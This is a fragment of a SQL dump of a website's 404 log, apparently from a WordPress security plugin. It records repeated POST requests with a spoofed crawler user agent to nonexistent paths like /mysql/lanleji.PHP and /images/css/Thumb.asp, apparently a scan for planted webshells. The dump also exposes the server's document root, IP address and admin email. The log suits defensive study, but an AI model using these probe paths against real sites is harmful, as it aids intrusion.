Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.29.241.47\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.29.241.47\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/cert/com1.dfsdf.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/cert/com1.dfsdf.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UTa6CYj3S7An3VFFr3AAAAVg\";s:12:\"REDIRECT_URL\";s:20:\"/cert/com1.dfsdf.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53501\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/cert/com1.dfsdf.asp\";s:10:\"SCRIPT_URL\";s:20:\"/cert/com1.dfsdf.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UTa6CYj3S7An3VFFr3AAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804237.4296\";s:12:\"REQUEST_TIME\";s:10:\"1571804237\";}}','notice','2019-10-23 04:17:20','2019-10-23 04:17:18',35267024,37066144,'http://bintara.com.my//cert/com1.dfsdf.asp',1,0,'61.29.241.47'),(28823,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//images/css/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.97.157.48\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.97.157.48\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UXe4vBmywCERyagfsnwAAAQk\";s:12:\"REDIRECT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53940\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:10:\"SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UXe4vBmywCERyagfsnwAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804253.5562\";s:12:\"REQUEST_TIME\";s:10:\"1571804253\";}}','notice','2019-10-23 04:17:36','2019-10-23 04:17:33',35340736,37141608,'http://bintara.com.my//images/css/Thumb.asp',1,0,'202.97.157.48'),(28824,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//images/css/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.232.224.233\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.232.224.233\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UadaMiBShLW1lPtcTXgAAAAQ\";s:12:\"REDIRECT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:10:\"SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UadaMiBShLW1lPtcTXgAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571804265.705\";s:12:\"REQUEST_TIME\";s:10:\"1571804265\";}}','notice','2019-10-23 04:17:48','2019-10-23 04:17:46',35272096,37071168,'http://bintara.com.my//images/css/Thumb.asp',1,0,'219.232.224.233'),(28825,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//2YQHYNSSRP/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"211.98.13.85\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"211.98.13.85\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/2YQHYNSSRP/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/2YQHYNSSRP/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UctaMiBShLW1lPtcTYAAAABY\";s:12:\"REDIRECT_URL\";s:21:\"/2YQHYNSSRP/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/2YQHYNSSRP/testp.asp\";s:10:\"SCRIPT_URL\";s:21:\"/2YQHYNSSRP/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UctaMiBShLW1lPtcTYAAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804274.1447\";s:12:\"REQUEST_TIME\";s:10:\"1571804274\";}}','notice','2019-10-23 04:17:56','2019-10-23 04:17:54',35342952,37146352,'http://bintara.com.my//2YQHYNSSRP/testp.asp',1,0,'211.98.13.85'),(28826,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//2YQHYNSSRP/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.146.124.18\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.146.124.18\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/2YQHYNSSRP/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/2YQHYNSSRP/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Ufa6CYj3S7An3VFFr6gAAAVc\";s:12:\"REDIRECT_URL\";s:21:\"/2YQHYNSSRP/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54877\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/2YQHYNSSRP/testp.asp\";s:10:\"SCRIPT_URL\";s:21:\"/2YQHYNSSRP/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Ufa6CYj3S7An3VFFr6gAAAVc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804285.6308\";s:12:\"REQUEST_TIME\";s:10:\"1571804285\";}}','notice','2019-10-23 04:18:08','2019-10-23 04:18:06',35270040,37071888,'http://bintara.com.my//2YQHYNSSRP/testp.asp',1,0,'211.146.124.18'),(28827,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//mysql/lanleji.PHP\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.65.191.22\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.65.191.22\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/mysql/lanleji.PHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/mysql/lanleji.PHP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Uga6CYj3S7An3VFFr6wAAAUA\";s:12:\"REDIRECT_URL\";s:18:\"/mysql/lanleji.PHP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54877\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/mysql/lanleji.PHP\";s:10:\"SCRIPT_URL\";s:18:\"/mysql/lanleji.PHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Uga6CYj3S7An3VFFr6wAAAUA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804289.3051\";s:12:\"REQUEST_TIME\";s:10:\"1571804289\";}}','notice','2019-10-23 04:18:11','2019-10-23 04:18:09',35268192,37074920,'http://bintara.com.my//mysql/lanleji.PHP',1,0,'218.65.191.22'),(28828,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//mysql/lanleji.PHP\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.192.63.235\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.192.63.235\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/mysql/lanleji.PHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/mysql/lanleji.PHP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UntaMiBShLW1lPtcTYwAAAAc\";s:12:\"REDIRECT_URL\";s:18:\"/mysql/lanleji.PHP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55713\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/mysql/lanleji.PHP\";s:10:\"SCRIPT_URL\";s:18:\"/mysql/lanleji.PHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UntaMiBShLW1lPtcTYwAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804318.1649\";s:12:\"REQUEST_TIME\";s:10:\"1571804318\";}}','notice','2019-10-23 04:18:42','2019-10-23 04:18:38',35269688,37066208,'http://bintara.com.my//mysql/lanleji.PHP',1,0,'220.192.63.235'),(28829,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//css/com1.dfsfsd.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"116.3.67.58\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"116.3.67.58\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/css/com1.dfsfsd.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/css/com1.dfsfsd.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Utq6CYj3S7An3VFFsBgAAAUo\";s:12:\"REDIRECT_URL\";s:20:\"/css/com1.dfsfsd.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56341\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/css/com1.dfsfsd.asp\";s:10:\"SCRIPT_URL\";s:20:\"/css/com1.dfsfsd.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Utq6CYj3S7An3VFFsBgAAAUo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804343.0587\";s:12:\"REQUEST_TIME\";s:10:\"1571804343\";}}','notice','2019-10-23 04:19:05','2019-10-23 04:19:03',35339384,37135656,'http://bintara.com.my//css/com1.dfsfsd.asp',1,0,'116.3.67.58'),(28830,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//base/admin/check.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.100.25.71\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.100.25.71\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/base/admin/check.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/base/admin/check.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UytaMiBShLW1lPtcTdwAAAA0\";s:12:\"REDIRECT_URL\";s:21:\"/base/admin/check.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56829\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/base/admin/check.asp\";s:10:\"SCRIPT_URL\";s:21:\"/base/admin/check.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UytaMiBShLW1lPtcTdwAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804362.2554\";s:12:\"REQUEST_TIME\";s:10:\"1571804362\";}}','notice','2019-10-23 04:19:24','2019-10-23 04:19:22',35341536,37138024,'http://bintara.com.my//base/admin/check.asp',1,0,'202.100.25.71'),(28831,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//base/admin/check.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 